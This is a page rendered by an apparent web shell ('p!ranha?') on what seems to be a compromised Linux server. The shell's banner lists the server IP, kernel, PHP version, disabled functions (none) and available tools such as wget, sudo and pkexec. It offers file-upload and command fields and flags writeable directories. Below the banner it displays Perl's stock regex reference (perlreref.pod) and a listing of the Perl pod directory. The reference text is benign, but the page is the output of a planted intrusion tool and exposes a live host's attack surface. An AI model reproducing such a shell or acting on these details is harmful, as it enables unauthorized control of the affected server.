p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/perl5/pod/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/share/perl5/pod/perlreref.pod
=head1 NAME

perlreref - Perl Regular Expressions Reference

=head1 DESCRIPTION

This is a quick reference to Perl's regular expressions.
For full information see L<perlre> and L<perlop>, as well
as the L</"SEE ALSO"> section in this document.

=head2 OPERATORS

C<=~> determines to which variable the regex is applied.
In its absence, $_ is used.

    $var =~ /foo/;

C<!~> determines to which variable the regex is applied,
and negates the result of the match; it returns
false if the match succeeds, and true if it fails.

    $var !~ /foo/;

C<m/pattern/msixpogcdual> searches a string for a pattern match,
applying the given options.

    m  Multiline mode - ^ and $ match internal lines
    s  match as a Single line - . matches \n
    i  case-Insensitive
    x  eXtended legibility - free whitespace and comments
    p  Preserve a copy of the matched string -
       ${^PREMATCH}, ${^MATCH}, ${^POSTMATCH} will be defined.
    o  compile pattern Once
    g  Global - all occurrences
    c  don't reset pos on failed matches when using /g
    a  restrict \d, \s, \w and [:posix:] to match ASCII only
    aa (two a's) also /i matches exclude ASCII/non-ASCII
    l  match according to current locale
    u  match according to Unicode rules
    d  match according to native rules unless something indicates
       Unicode

If 'pattern' is an empty string, the last I<successfully> matched
regex is used. Delimiters other than '/' may be used for both this
operator and the following ones. The leading C<m> can be omitted
if the delimiter is '/'.

C<qr/pattern/msixpodual> lets you store a regex in a variable,
or pass one around. Modifiers as for C<m//>, and are stored
within the regex.

C<s/pattern/replacement/msixpogcedual> substitutes matches of
'pattern' with 'replacement'. Modifiers as for C<m//>,
with two additions:

    e  Evaluate 'replacement' as an expression
    r  Return substitution and leave the original string untouched.

'e' may be specified multiple times. 'replacement' is interpreted
as a double quoted string unless a single-quote (C<'>) is the delimiter.

C<?pattern?> is like C<m/pattern/> but matches only once. No alternate
delimiters can be used.  Must be reset with reset().

=head2 SYNTAX

 \       Escapes the character immediately following it
 .       Matches any single character except a newline (unless /s is
           used)
 ^       Matches at the beginning of the string (or line, if /m is used)
 $       Matches at the end of the string (or line, if /m is used)
 *       Matches the preceding element 0 or more times
 +       Matches the preceding element 1 or more times
 ?       Matches the preceding element 0 or 1 times
 {...}   Specifies a range of occurrences for the element preceding it
 [...]   Matches any one of the characters contained within the brackets
 (...)   Groups subexpressions for capturing to $1, $2...
 (?:...) Groups subexpressions without capturing (cluster)
 |       Matches either the subexpression preceding or following it
 \g1 or \g{1}, \g2 ...    Matches the text from the Nth group
 \1, \2, \3 ...           Matches the text from the Nth group
 \g-1 or \g{-1}, \g-2 ... Matches the text from the Nth previous group
 \g{name}     Named backreference
 \k<name>     Named backreference
 \k'name'     Named backreference
 (?P=name)    Named backreference (python syntax)

=head2 ESCAPE SEQUENCES

These work as in normal strings.

   \a       Alarm (beep)
   \e       Escape
   \f       Formfeed
   \n       Newline
   \r       Carriage return
   \t       Tab
   \037     Char whose ordinal is the 3 octal digits, max \777
   \o{2307} Char whose ordinal is the octal number, unrestricted
   \x7f     Char whose ordinal is the 2 hex digits, max \xFF
   \x{263a} Char whose ordinal is the hex number, unrestricted
   \cx      Control-x
   \N{name} A named Unicode character or character sequence
   \N{U+263D} A Unicode character by hex ordinal

   \l  Lowercase next character
   \u  Titlecase next character
   \L  Lowercase until \E
   \U  Uppercase until \E
   \F  Foldcase until \E
   \Q  Disable pattern metacharacters until \E
   \E  End modification

For Titlecase, see L</Titlecase>.

This one works differently from normal strings:

   \b  An assertion, not backspace, except in a character class

=head2 CHARACTER CLASSES

   [amy]    Match 'a', 'm' or 'y'
   [f-j]    Dash specifies "range"
   [f-j-]   Dash escaped or at start or end means 'dash'
   [^f-j]   Caret indicates "match any character _except_ these"

The following sequences (except C<\N>) work within or without a character class.
The first six are locale aware, all are Unicode aware. See L<perllocale>
and L<perlunicode> for details.

   \d      A digit
   \D      A nondigit
   \w      A word character
   \W      A non-word character
   \s      A whitespace character
   \S      A non-whitespace character
   \h      An horizontal whitespace
   \H      A non horizontal whitespace
   \N      A non newline (when not followed by '{NAME}'; experimental;
           not valid in a character class; equivalent to [^\n]; it's
           like '.' without /s modifier)
   \v      A vertical whitespace
   \V      A non vertical whitespace
   \R      A generic newline           (?>\v|\x0D\x0A)

   \C      Match a byte (with Unicode, '.' matches a character)
   \pP     Match P-named (Unicode) property
   \p{...} Match Unicode property with name longer than 1 character
   \PP     Match non-P
   \P{...} Match lack of Unicode property with name longer than 1 char
   \X      Match Unicode extended grapheme cluster

POSIX character classes and their Unicode and Perl equivalents:

            ASCII-         Full-
   POSIX    range          range    backslash
 [[:...:]]  \p{...}        \p{...}   sequence    Description

 -----------------------------------------------------------------------
 alnum   PosixAlnum       XPosixAlnum            Alpha plus Digit
 alpha   PosixAlpha       XPosixAlpha            Alphabetic characters
 ascii   ASCII                                   Any ASCII character
 blank   PosixBlank       XPosixBlank   \h       Horizontal whitespace;
                                                   full-range also
                                                   written as
                                                   \p{HorizSpace} (GNU
                                                   extension)
 cntrl   PosixCntrl       XPosixCntrl            Control characters
 digit   PosixDigit       XPosixDigit   \d       Decimal digits
 graph   PosixGraph       XPosixGraph            Alnum plus Punct
 lower   PosixLower       XPosixLower            Lowercase characters
 print   PosixPrint       XPosixPrint            Graph plus Print, but
                                                   not any Cntrls
 punct   PosixPunct       XPosixPunct            Punctuation and Symbols
                                                   in ASCII-range; just
                                                   punct outside it
 space   PosixSpace       XPosixSpace            [\s\cK]
         PerlSpace        XPerlSpace    \s       Perl's whitespace def'n
 upper   PosixUpper       XPosixUpper            Uppercase characters
 word    PosixWord        XPosixWord    \w       Alnum + Unicode marks +
                                                   connectors, like '_'
                                                   (Perl extension)
 xdigit  ASCII_Hex_Digit  XPosixDigit            Hexadecimal digit,
                                                    ASCII-range is
                                                    [0-9A-Fa-f]

Also, various synonyms like C<\p{Alpha}> for C<\p{XPosixAlpha}>; all listed
in L<perluniprops/Properties accessible through \p{} and \P{}>

Within a character class:

    POSIX      traditional   Unicode
  [:digit:]       \d        \p{Digit}
  [:^digit:]      \D        \P{Digit}

=head2 ANCHORS

All are zero-width assertions.

   ^  Match string start (or line, if /m is used)
   $  Match string end (or line, if /m is used) or before newline
   \b Match word boundary (between \w and \W)
   \B Match except at word boundary (between \w and \w or \W and \W)
   \A Match string start (regardless of /m)
   \Z Match string end (before optional newline)
   \z Match absolute string end
   \G Match where previous m//g left off
   \K Keep the stuff left of the \K, don't include it in $&

=head2 QUANTIFIERS

Quantifiers are greedy by default and match the B<longest> leftmost.

   Maximal Minimal Possessive Allowed range
   ------- ------- ---------- -------------
   {n,m}   {n,m}?  {n,m}+     Must occur at least n times
                              but no more than m times
   {n,}    {n,}?   {n,}+      Must occur at least n times
   {n}     {n}?    {n}+       Must occur exactly n times
   *       *?      *+         0 or more times (same as {0,})
   +       +?      ++         1 or more times (same as {1,})
   ?       ??      ?+         0 or 1 time (same as {0,1})

The possessive forms (new in Perl 5.10) prevent backtracking: what gets
matched by a pattern with a possessive quantifier will not be backtracked
into, even if that causes the whole match to fail.

There is no quantifier C<{,n}>. That's interpreted as a literal string.

=head2 EXTENDED CONSTRUCTS

   (?#text)          A comment
   (?:...)           Groups subexpressions without capturing (cluster)
   (?pimsx-imsx:...) Enable/disable option (as per m// modifiers)
   (?=...)           Zero-width positive lookahead assertion
   (?!...)           Zero-width negative lookahead assertion
   (?<=...)          Zero-width positive lookbehind assertion
   (?<!...)          Zero-width negative lookbehind assertion
   (?>...)           Grab what we can, prohibit backtracking
   (?|...)           Branch reset
   (?<name>...)      Named capture
   (?'name'...)      Named capture
   (?P<name>...)     Named capture (python syntax)
   (?{ code })       Embedded code, return value becomes $^R
   (??{ code })      Dynamic regex, return value used as regex
   (?N)              Recurse into subpattern number N
   (?-N), (?+N)      Recurse into Nth previous/next subpattern
   (?R), (?0)        Recurse at the beginning of the whole pattern
   (?&name)          Recurse into a named subpattern
   (?P>name)         Recurse into a named subpattern (python syntax)
   (?(cond)yes|no)
   (?(cond)yes)      Conditional expression, where "cond" can be:
                     (?=pat)   look-ahead
                     (?!pat)   negative look-ahead
                     (?<=pat)  look-behind
                     (?<!pat)  negative look-behind
                     (N)       subpattern N has matched something
                     (<name>)  named subpattern has matched something
                     ('name')  named subpattern has matched something
                     (?{code}) code condition
                     (R)       true if recursing
                     (RN)      true if recursing into Nth subpattern
                     (R&name)  true if recursing into named subpattern
                     (DEFINE)  always false, no no-pattern allowed

=head2 VARIABLES

   $_    Default variable for operators to use

   $`    Everything prior to matched string
   $&    Entire matched string
   $'    Everything after to matched string

   ${^PREMATCH}   Everything prior to matched string
   ${^MATCH}      Entire matched string
   ${^POSTMATCH}  Everything after to matched string

The use of C<$`>, C<$&> or C<$'> will slow down B<all> regex use
within your program. Consult L<perlvar> for C<@->
to see equivalent expressions that won't cause slow down.
See also L<Devel::SawAmpersand>. Starting with Perl 5.10, you
can also use the equivalent variables C<${^PREMATCH}>, C<${^MATCH}>
and C<${^POSTMATCH}>, but for them to be defined, you have to
specify the C</p> (preserve) modifier on your regular expression.

   $1, $2 ...  hold the Xth captured expr
   $+    Last parenthesized pattern match
   $^N   Holds the most recently closed capture
   $^R   Holds the result of the last (?{...}) expr
   @-    Offsets of starts of groups. $-[0] holds start of whole match
   @+    Offsets of ends of groups. $+[0] holds end of whole match
   %+    Named capture groups
   %-    Named capture groups, as array refs

Captured groups are numbered according to their I<opening> paren.

=head2 FUNCTIONS

   lc          Lowercase a string
   lcfirst     Lowercase first char of a string
   uc          Uppercase a string
   ucfirst     Titlecase first char of a string
   fc          Foldcase a string

   pos         Return or set current match position
   quotemeta   Quote metacharacters
   reset       Reset ?pattern? status
   study       Analyze string for optimizing matching

   split       Use a regex to split a string into parts

The first five of these are like the escape sequences C<\L>, C<\l>,
C<\U>, C<\u>, and C<\F>.  For Titlecase, see L</Titlecase>; For
Foldcase, see L</Foldcase>.

=head2 TERMINOLOGY

=head3 Titlecase

Unicode concept which most often is equal to uppercase, but for
certain characters like the German "sharp s" there is a difference.

=head3 Foldcase

Unicode form that is useful when comparing strings regardless of case,
as certain characters have compex one-to-many case mappings. Primarily a
variant of lowercase.

=head1 AUTHOR

Iain Truskett. Updated by the Perl 5 Porters.

This document may be distributed under the same terms as Perl itself.

=head1 SEE ALSO

=over 4

=item *

L<perlretut> for a tutorial on regular expressions.

=item *

L<perlrequick> for a rapid tutorial.

=item *

L<perlre> for more details.

=item *

L<perlvar> for details on the variables.

=item *

L<perlop> for details on the operators.

=item *

L<perlfunc> for details on the functions.

=item *

L<perlfaq6> for FAQs on regular expressions.

=item *

L<perlrebackslash> for a reference on backslash sequences.

=item *

L<perlrecharclass> for a reference on character classes.

=item *

The L<re> module to alter behaviour and aid
debugging.

=item *

L<perldebug/"Debugging Regular Expressions">

=item *

L<perluniintro>, L<perlunicode>, L<charnames> and L<perllocale>
for details on regexes and internationalisation.

=item *

I<Mastering Regular Expressions> by Jeffrey Friedl
(F<http://oreilly.com/catalog/9780596528126/>) for a thorough grounding and
reference on the topic.

=back

=head1 THANKS

David P.C. Wollmann,
Richard Soderberg,
Sean M. Burke,
Tom Christiansen,
Jim Cromie,
and
Jeffrey Goff
for useful advice.

=cut
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
January 19 2024 08:12:46
0 / 0
0755
a2p.pod
5.962 KB
February 02 2021 16:32:27
0 / 0
0644
perl.pod
15.429 KB
February 02 2021 16:32:27
0 / 0
0644
perl5004delta.pod
54.921 KB
February 02 2021 16:32:27
0 / 0
0644
perl5005delta.pod
33.48 KB
February 02 2021 16:32:27
0 / 0
0644
perl5100delta.pod
53.413 KB
February 02 2021 16:32:27
0 / 0
0644
perl5101delta.pod
42.858 KB
February 02 2021 16:32:27
0 / 0
0644
perl5120delta.pod
87.193 KB
February 02 2021 16:32:27
0 / 0
0644
perl5121delta.pod
9.905 KB
February 02 2021 16:32:27
0 / 0
0644
perl5122delta.pod
9.378 KB
February 02 2021 16:32:27
0 / 0
0644
perl5123delta.pod
4.004 KB
February 02 2021 16:32:27
0 / 0
0644
perl5124delta.pod
3.586 KB
February 02 2021 16:32:27
0 / 0
0644
perl5140delta.pod
140.941 KB
February 02 2021 16:32:27
0 / 0
0644
perl5141delta.pod
7.779 KB
February 02 2021 16:32:27
0 / 0
0644
perl5142delta.pod
6.73 KB
February 02 2021 16:32:27
0 / 0
0644
perl5143delta.pod
7.578 KB
February 02 2021 16:32:27
0 / 0
0644
perl5160delta.pod
130.52 KB
February 02 2021 16:32:27
0 / 0
0644
perl5161delta.pod
5.998 KB
February 02 2021 16:32:27
0 / 0
0644
perl5162delta.pod
3.51 KB
February 02 2021 16:32:27
0 / 0
0644
perl5163delta.pod
3.985 KB
February 02 2021 16:32:27
0 / 0
0644
perl561delta.pod
121.786 KB
February 02 2021 16:32:27
0 / 0
0644
perl56delta.pod
104.685 KB
February 02 2021 16:32:27
0 / 0
0644
perl581delta.pod
37.168 KB
February 02 2021 16:32:27
0 / 0
0644
perl582delta.pod
4.365 KB
February 02 2021 16:32:27
0 / 0
0644
perl583delta.pod
6.187 KB
February 02 2021 16:32:27
0 / 0
0644
perl584delta.pod
7.19 KB
February 02 2021 16:32:27
0 / 0
0644
perl585delta.pod
5.751 KB
February 02 2021 16:32:27
0 / 0
0644
perl586delta.pod
4.542 KB
February 02 2021 16:32:27
0 / 0
0644
perl587delta.pod
8.161 KB
February 02 2021 16:32:27
0 / 0
0644
perl588delta.pod
24.68 KB
February 02 2021 16:32:27
0 / 0
0644
perl589delta.pod
52.637 KB
February 02 2021 16:32:27
0 / 0
0644
perl58delta.pod
112.215 KB
February 02 2021 16:32:27
0 / 0
0644
perlaix.pod
18.768 KB
February 02 2021 16:32:27
0 / 0
0644
perlamiga.pod
6.869 KB
February 02 2021 16:32:27
0 / 0
0644
perlapi.pod
315.465 KB
February 02 2021 16:32:27
0 / 0
0644
perlapio.pod
18.878 KB
February 02 2021 16:32:27
0 / 0
0644
perlartistic.pod
6.846 KB
February 02 2021 16:32:27
0 / 0
0644
perlbeos.pod
2.867 KB
February 02 2021 16:32:27
0 / 0
0644
perlbook.pod
7.192 KB
February 02 2021 16:32:27
0 / 0
0644
perlboot.pod
0.179 KB
February 02 2021 16:32:27
0 / 0
0644
perlbot.pod
0.178 KB
February 02 2021 16:32:27
0 / 0
0644
perlbs2000.pod
7.733 KB
February 02 2021 16:32:27
0 / 0
0644
perlcall.pod
54.026 KB
February 02 2021 16:32:27
0 / 0
0644
perlce.pod
8.723 KB
February 02 2021 16:32:27
0 / 0
0644
perlcheat.pod
4.395 KB
February 02 2021 16:32:27
0 / 0
0644
perlclib.pod
7.504 KB
February 02 2021 16:32:27
0 / 0
0644
perlcn.pod
4.815 KB
February 02 2021 16:32:27
0 / 0
0644
perlcommunity.pod
6.293 KB
February 02 2021 16:32:27
0 / 0
0644
perlcygwin.pod
27.17 KB
February 02 2021 16:32:27
0 / 0
0644
perldata.pod
36.331 KB
February 02 2021 16:32:27
0 / 0
0644
perldbmfilter.pod
4.863 KB
February 02 2021 16:32:27
0 / 0
0644
perldebguts.pod
36.789 KB
February 02 2021 16:32:27
0 / 0
0644
perldebtut.pod
20.786 KB
February 02 2021 16:32:27
0 / 0
0644
perldebug.pod
38.151 KB
February 02 2021 16:32:27
0 / 0
0644
perldelta.pod
3.985 KB
February 02 2021 16:32:27
0 / 0
0644
perldgux.pod
2.754 KB
February 02 2021 16:32:27
0 / 0
0644
perldiag.pod
207.818 KB
February 02 2021 16:32:27
0 / 0
0644
perldos.pod
10.275 KB
February 02 2021 16:32:27
0 / 0
0644
perldsc.pod
24.837 KB
February 02 2021 16:32:27
0 / 0
0644
perldtrace.pod
6.209 KB
February 02 2021 16:32:27
0 / 0
0644
perlebcdic.pod
67.605 KB
February 02 2021 16:32:27
0 / 0
0644
perlembed.pod
35.209 KB
February 02 2021 16:32:27
0 / 0
0644
perlepoc.pod
3.572 KB
February 02 2021 16:32:27
0 / 0
0644
perlexperiment.pod
4.843 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq.pod
22.007 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq1.pod
13.519 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq2.pod
9.278 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq3.pod
37.464 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq4.pod
87.393 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq5.pod
54.113 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq6.pod
38.664 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq7.pod
36.352 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq8.pod
48.279 KB
February 02 2021 16:32:27
0 / 0
0644
perlfaq9.pod
14.709 KB
February 02 2021 16:32:27
0 / 0
0644
perlfork.pod
12.782 KB
February 02 2021 16:32:27
0 / 0
0644
perlform.pod
16.287 KB
February 02 2021 16:32:27
0 / 0
0644
perlfreebsd.pod
1.554 KB
February 02 2021 16:32:27
0 / 0
0644
perlfunc.pod
338.432 KB
February 02 2021 16:32:27
0 / 0
0644
perlgit.pod
29.755 KB
February 02 2021 16:32:27
0 / 0
0644
perlglossary.pod
110.655 KB
February 02 2021 16:32:27
0 / 0
0644
perlgpl.pod
13.537 KB
February 02 2021 16:32:27
0 / 0
0644
perlguts.pod
111.664 KB
February 02 2021 16:32:27
0 / 0
0644
perlhack.pod
35.03 KB
February 02 2021 16:32:27
0 / 0
0644
perlhacktips.pod
45.498 KB
February 02 2021 16:32:27
0 / 0
0644
perlhacktut.pod
6.068 KB
February 02 2021 16:32:27
0 / 0
0644
perlhaiku.pod
1.469 KB
February 02 2021 16:32:27
0 / 0
0644
perlhist.pod
43.319 KB
February 02 2021 16:32:27
0 / 0
0644
perlhpux.pod
28.065 KB
February 02 2021 16:32:27
0 / 0
0644
perlhurd.pod
1.94 KB
February 02 2021 16:32:27
0 / 0
0644
perlintern.pod
42.532 KB
February 02 2021 16:32:27
0 / 0
0644
perlinterp.pod
30.002 KB
February 02 2021 16:32:27
0 / 0
0644
perlintro.pod
22.085 KB
February 02 2021 16:32:27
0 / 0
0644
perliol.pod
33.027 KB
February 02 2021 16:32:27
0 / 0
0644
perlipc.pod
70.165 KB
February 02 2021 16:32:27
0 / 0
0644
perlirix.pod
4.291 KB
February 02 2021 16:32:27
0 / 0
0644
perljp.pod
7.572 KB
February 02 2021 16:32:27
0 / 0
0644
perlko.pod
7.521 KB
February 02 2021 16:32:27
0 / 0
0644
perllexwarn.pod
14.612 KB
February 02 2021 16:32:27
0 / 0
0644
perllinux.pod
1.453 KB
February 02 2021 16:32:27
0 / 0
0644
perllocale.pod
51.435 KB
February 02 2021 16:32:27
0 / 0
0644
perllol.pod
10.935 KB
February 02 2021 16:32:27
0 / 0
0644
perlmacos.pod
0.978 KB
February 02 2021 16:32:27
0 / 0
0644
perlmacosx.pod
10.399 KB
February 02 2021 16:32:27
0 / 0
0644
perlmod.pod
24.041 KB
February 02 2021 16:32:27
0 / 0
0644
perlmodinstall.pod
12.412 KB
February 02 2021 16:32:27
0 / 0
0644
perlmodlib.pod
78.491 KB
February 02 2021 16:32:27
0 / 0
0644
perlmodstyle.pod
20.757 KB
February 02 2021 16:32:27
0 / 0
0644
perlmpeix.pod
14.236 KB
February 02 2021 16:32:27
0 / 0
0644
perlmroapi.pod
3.128 KB
February 02 2021 16:32:27
0 / 0
0644
perlnetware.pod
6.348 KB
February 02 2021 16:32:27
0 / 0
0644
perlnewmod.pod
10.952 KB
February 02 2021 16:32:27
0 / 0
0644
perlnumber.pod
8.156 KB
February 02 2021 16:32:27
0 / 0
0644
perlobj.pod
33.653 KB
February 02 2021 16:32:27
0 / 0
0644
perlootut.pod
25.604 KB
February 02 2021 16:32:27
0 / 0
0644
perlop.pod
121.731 KB
February 02 2021 16:32:27
0 / 0
0644
perlopenbsd.pod
1.176 KB
February 02 2021 16:32:27
0 / 0
0644
perlopentut.pod
37.533 KB
February 02 2021 16:32:27
0 / 0
0644
perlos2.pod
90.533 KB
February 02 2021 16:32:27
0 / 0
0644
perlos390.pod
15.2 KB
February 02 2021 16:32:27
0 / 0
0644
perlos400.pod
4.513 KB
February 02 2021 16:32:27
0 / 0
0644
perlpacktut.pod
49.834 KB
February 02 2021 16:32:27
0 / 0
0644
perlperf.pod
50.048 KB
February 02 2021 16:32:27
0 / 0
0644
perlplan9.pod
5.005 KB
February 02 2021 16:32:27
0 / 0
0644
perlpod.pod
21.27 KB
February 02 2021 16:32:27
0 / 0
0644
perlpodspec.pod
66.203 KB
February 02 2021 16:32:27
0 / 0
0644
perlpolicy.pod
19.726 KB
February 02 2021 16:32:27
0 / 0
0644
perlport.pod
82.635 KB
February 02 2021 16:32:27
0 / 0
0644
perlpragma.pod
5.105 KB
February 02 2021 16:32:27
0 / 0
0644
perlqnx.pod
4.145 KB
February 02 2021 16:32:27
0 / 0
0644
perlre.pod
100.761 KB
February 02 2021 16:32:27
0 / 0
0644
perlreapi.pod
25.168 KB
February 02 2021 16:32:27
0 / 0
0644
perlrebackslash.pod
25.644 KB
February 02 2021 16:32:27
0 / 0
0644
perlrecharclass.pod
34.188 KB
February 02 2021 16:32:27
0 / 0
0644
perlref.pod
28.319 KB
February 02 2021 16:32:27
0 / 0
0644
perlreftut.pod
18.232 KB
February 02 2021 16:32:27
0 / 0
0644
perlreguts.pod
35.995 KB
February 02 2021 16:32:27
0 / 0
0644
perlrequick.pod
17.499 KB
February 02 2021 16:32:27
0 / 0
0644
perlreref.pod
14.19 KB
February 02 2021 16:32:27
0 / 0
0644
perlretut.pod
115.128 KB
February 02 2021 16:32:27
0 / 0
0644
perlriscos.pod
1.493 KB
February 02 2021 16:32:27
0 / 0
0644
perlrun.pod
49.575 KB
February 02 2021 16:32:27
0 / 0
0644
perlsec.pod
22.768 KB
February 02 2021 16:32:27
0 / 0
0644
perlsolaris.pod
28.63 KB
February 02 2021 16:32:27
0 / 0
0644
perlsource.pod
6.194 KB
February 02 2021 16:32:27
0 / 0
0644
perlstyle.pod
8.416 KB
February 02 2021 16:32:27
0 / 0
0644
perlsub.pod
55.153 KB
February 02 2021 16:32:27
0 / 0
0644
perlsymbian.pod
15.439 KB
February 02 2021 16:32:27
0 / 0
0644
perlsyn.pod
41.044 KB
February 02 2021 16:32:27
0 / 0
0644
perlthrtut.pod
45.407 KB
February 02 2021 16:32:27
0 / 0
0644
perltie.pod
37.02 KB
February 02 2021 16:32:27
0 / 0
0644
perltoc.pod
638.995 KB
February 02 2021 16:32:27
0 / 0
0644
perltodo.pod
0.354 KB
February 02 2021 16:32:27
0 / 0
0644
perltooc.pod
0.179 KB
February 02 2021 16:32:27
0 / 0
0644
perltoot.pod
0.179 KB
February 02 2021 16:32:27
0 / 0
0644
perltrap.pod
40.281 KB
February 02 2021 16:32:27
0 / 0
0644
perltru64.pod
7.552 KB
February 02 2021 16:32:27
0 / 0
0644
perltw.pod
5.151 KB
February 02 2021 16:32:27
0 / 0
0644
perlunicode.pod
70.891 KB
February 02 2021 16:32:27
0 / 0
0644
perlunifaq.pod
13.314 KB
February 02 2021 16:32:27
0 / 0
0644
perluniintro.pod
35.443 KB
February 02 2021 16:32:27
0 / 0
0644
perluniprops.pod
229.736 KB
February 02 2021 16:32:27
0 / 0
0644
perlunitut.pod
7.756 KB
February 02 2021 16:32:27
0 / 0
0644
perlutil.pod
9.679 KB
February 02 2021 16:32:27
0 / 0
0644
perluts.pod
3.105 KB
February 02 2021 16:32:27
0 / 0
0644
perlvar.pod
69.188 KB
February 02 2021 16:32:27
0 / 0
0644
perlvmesa.pod
3.881 KB
February 02 2021 16:32:27
0 / 0
0644
perlvms.pod
51.333 KB
February 02 2021 16:32:27
0 / 0
0644
perlvos.pod
5.823 KB
February 02 2021 16:32:27
0 / 0
0644
perlwin32.pod
34.581 KB
February 02 2021 16:32:27
0 / 0
0644
perlxs.pod
71.663 KB
February 02 2021 16:32:27
0 / 0
0644
perlxstut.pod
48.517 KB
February 02 2021 16:32:27
0 / 0
0644
perlxstypemap.pod
22.966 KB
February 02 2021 16:32:27
0 / 0
0644